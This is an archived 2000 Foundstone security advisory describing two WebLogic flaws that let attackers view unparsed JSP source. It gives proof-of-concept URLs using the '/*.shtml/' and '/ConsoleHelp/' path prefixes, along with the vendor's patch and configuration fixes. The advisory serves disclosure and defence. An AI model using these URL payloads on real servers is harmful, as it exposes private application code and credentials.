FS-072800-9-BEA.txt

2000-07-30T00:00:00
ID PACKETSTORM:22679
Type packetstorm
Reporter Saumil Shah
Modified 2000-07-30T00:00:00

Description

                                        
                                            ` Foundstone, Inc.  
http://www.foundstone.com  
"Securing the Dot Com World"  
  
Security Advisory  
  
BEA's WebLogic force handlers show code vulnerability  
  
----------------------------------------------------------------------  
FS Advisory ID: FS-072800-9-BEA  
  
Release Date: July 28, 2000  
  
Product: WebLogic  
  
Vendor: BEA Systems (http://www.beasys.com)  
  
Vendor Advisory: Contact the vendor  
  
Type: Forced Handlers: Show code vulnerability  
  
Severity: Low to Medium (depending on JSP/JHTML coding  
practices & web application security)  
  
Author: Saumil Shah (saumil.shah@foundstone.com)  
Shreeraj Shah (shreeraj.shah@foundstone.com)  
  
Operating Systems: All operating systems  
  
Vulnerable versions: BEA WebLogic Enterprise 5.1.x  
BEA WebLogic Server and Express 5.1.x  
BEA WebLogic Server and Express 4.5.x  
  
Foundstone Advisory: http://www.foundstone.com  
----------------------------------------------------------------------  
  
Description  
  
Two show code vulnerabilities exist with BEA's WebLogic 5.1.0  
allowing an attacker to view the source code of any file  
within the web document root of the web server. Depending on  
web application and directory structure attacker can access  
and view unauthorized files.  
  
Details  
  
1. Viewing unparsed pages by forcibly invoking SSIServlet:  
----------------------------------------------------------  
  
Server Side Includes pages are processed by the SSIServlet in  
WebLogic.  
  
It is registered in the weblogic.properties file as follows:  
  
weblogic.httpd.register.*.shtml=  
weblogic.servlet.ServerSideIncludeServlet  
  
It turns out that the wild card (*) registration can itself be  
used as a handler to invoke the SSIServlet via a URL.  
  
Thus, if the file path in the URL is prefixed with /*.shtml/,  
one can force that file to be processed by SSIServlet. If used  
against other file types such as .jsp and .jhtml, unparsed jsp  
and jhtml code can be viewed.  
  
2. Viewing unparsed pages by forcibly invoking FileServlet:  
-----------------------------------------------------------  
  
WebLogic comes pre-configured with the ConsoleHelp servlet  
being registered to invoke FileServlet, as can be seen from  
the following lines in the weblogic.properties file:  
  
# For Console help. Do not modify.  
weblogic.httpd.register.ConsoleHelp=  
weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.ConsoleHelp=\  
defaultFilename=/weblogic/admin/help/NoContent.html  
weblogic.allow.execute.weblogic.servlet.ConsoleHelp=everyone  
  
Thus, if the file path in the URL is prefixed with  
/ConsoleHelp/, it causes WebLogic to invoke FileServlet, which  
causes pages to be displayed without being parsed or compiled.  
  
Proof of concept  
  
1. Using *.shtml:  
  
Prefixing the path to web pages with "/*.shtml/" in the URL  
causes the file to be displayed since it is processed by  
SSIServlet. For example if the URL for a file "login.jsp" is:  
  
http://site.running.weblogic/login.jsp  
  
then accessing  
  
http://site.running.weblogic/*.shtml/login.jsp  
  
would served by SSIServlet and jsp/jhtml code can be seen  
in the web browser.  
  
2. Using ConsoleHelp:  
  
Prefixing the path to web pages with "/ConsoleHelp/" in the  
URL causes the file to be displayed without being parsed or  
compiled. For example if the URL for a file "login.jsp" is:  
  
http://site.running.weblogic/login.jsp  
  
then accessing  
  
http://site.running.weblogic/ConsoleHelp/login.jsp  
  
would cause the unparsed contents of the file to show up in  
the web browser.  
  
Solution  
  
Please refer to BEA security advisory BEA00-03.00.  
  
From the vendor (as appears in BEA00-03.00):  
  
(1) Apply the "Show Code" vulnerability patch available from  
BEA Technical Support. This patch is available for:  
  
Version: The J-Engine in BEA WebLogic Enterprise 5.1.x  
BEA WebLogic Server and Express 5.1.x  
BEA WebLogic Server and Express 4.5.x  
  
Action: Contact BEA Technical Support at support@bea.com for  
patch.  
  
(2) Once the patch has been applied, review the  
weblogic.propertiesfile and ensure that the following changes  
have been made:  
  
weblogic.httpd.register.file=weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.file=defaultFilename=index.html  
weblogic.httpd.defaultServlet=file  
  
should be changed to:  
  
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.*.html=defaultFilename=index.html  
weblogic.httpd.defaultServlet=*.html  
  
Future Service Packs for BEA WebLogic Server and Express will  
also contain the patch to address this vulnerability.  
  
Credits  
  
We would like to thank BEA Systems for their prompt and  
serious reaction to this problem.  
  
Disclaimer  
  
THE INFORMATION CONTAINED IN THIS ADVISORY IS THE COPYRIGHT  
(C) 2000 OF FOUNDSTONE, INC. AND BELIEVED TO BE ACCURATE AT  
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS  
GIVEN, EXPRESS OR IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS.  
NEITHER THE AUTHOR NOR THE PUBLISHER ACCEPTS ANY LIABILITY  
WHATSOEVER FOR ANY DIRECT, INDIRECT OR CONQUENTIAL LOSS OR  
DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE PLACED  
ON, THIS INFORMATION FOR ANY PURPOSE. THIS ADVISORY MAY BE  
REDISTRIBUTED PROVIDED THAT NO FEE IS ASSIGNED AND THAT THE  
ADVISORY IS NOT MODIFIED IN ANY WAY.  
  
`